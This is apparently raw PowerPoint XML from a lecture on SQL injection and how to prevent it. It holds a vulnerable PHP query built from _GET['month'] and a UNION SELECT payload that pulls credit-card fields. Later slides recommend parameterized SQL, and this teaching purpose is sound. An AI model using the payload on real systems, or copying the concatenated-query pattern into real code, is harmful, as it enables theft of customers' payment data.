                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>; exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>If SQL server context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>runs as “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”, attacker gets account on DB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{05D07F75-139E-4502-A23C-6822D349B884}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5666118" y="4159770"/>
            <a:ext cx="2258682" cy="422694"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:no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dirty="0" smtClean="0"/>
              <a:t>Getting private info</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B48B904-BC1F-41F8-9C0D-7B609891F703}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="109576" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="1981199"/>
            <a:ext cx="5257800" cy="4186461"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>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smtClean="0"/>
              <a:t>Getting private info</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27652" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2284413" y="1554163"/>
            <a:ext cx="6001579" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Utopia"/>
              </a:rPr>
              <a:t>“SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Utopia"/>
              </a:rPr>
              <a:t>pizza, toppings, quantity, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Utopia"/>
              </a:rPr>
              <a:t>date</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Utopia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Utopia"/>
              </a:rPr>
              <a:t>  FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Utopia"/>
              </a:rPr>
              <a:t>orders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Utopia"/>
              </a:rPr>
              <a:t>  WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Utopia"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Utopia"/>
              </a:rPr>
              <a:t>=” . $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Utopia"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Utopia"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Utopia"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Utopia"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Utopia"/>
              </a:rPr>
              <a:t>“AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Utopia"/>
              </a:rPr>
              <a:t>order_month</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Utopia"/>
              </a:rPr>
              <a:t>=”  . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Utopia"/>
              </a:rPr>
              <a:t>_GET[‘month’]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Utopia"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36868" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1598612"/>
            <a:ext cx="1604962" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Query</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="3886200"/>
            <a:ext cx="8920262" cy="2462213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>What if:   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="344488" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	month = “</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="569913" algn="l"/>
                <a:tab pos="914400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Utopia" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Utopia" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0 AND 1=0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Utopia" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Utopia" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>		UNION SELECT   name,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Utopia" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CC_num</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Utopia" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Utopia" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>exp_mon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Utopia" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Utopia" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>exp_year</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Utopia" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Utopia" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Utopia" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>		FROM  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Utopia" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>creditcards</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Utopia" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </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noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Results</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B0ABF9E8-C518-4F97-8A48-0E069CEF0A2B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43010" name="Picture 2" descr="7842f0803"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="949325" y="1295400"/>
            <a:ext cx="7143750" cy="5056188"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43012" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5257800" y="2590800"/>
            <a:ext cx="2735263" cy="822325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Credit Card Info </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Compromised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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1562100"/>
            <a:ext cx="7467600" cy="3721100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2362200" y="2895600"/>
            <a:ext cx="5943600" cy="3377682"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="406555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66917E9-C890-4124-BBEF-2FBCA2116E52}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="99330" name="Picture 2" descr="Exploits of a Mom"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1371600"/>
            <a:ext cx="8444964" cy="2599426"/>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Preventing SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Never build SQL commands yourself !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use  parameterized/prepared  SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use  ORM  framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>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609600" y="3124200"/>
            <a:ext cx="6629400" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>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Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1306626" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Parameterized/prepared  SQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1306627" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1524000"/>
            <a:ext cx="8534400" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Builds </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>SQL queries by properly escaping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>′  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>   \′</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="100000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Example:   Parameterized SQL:    (ASP.NET 1.1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Ensures SQL arguments are properly escaped.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SqlCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
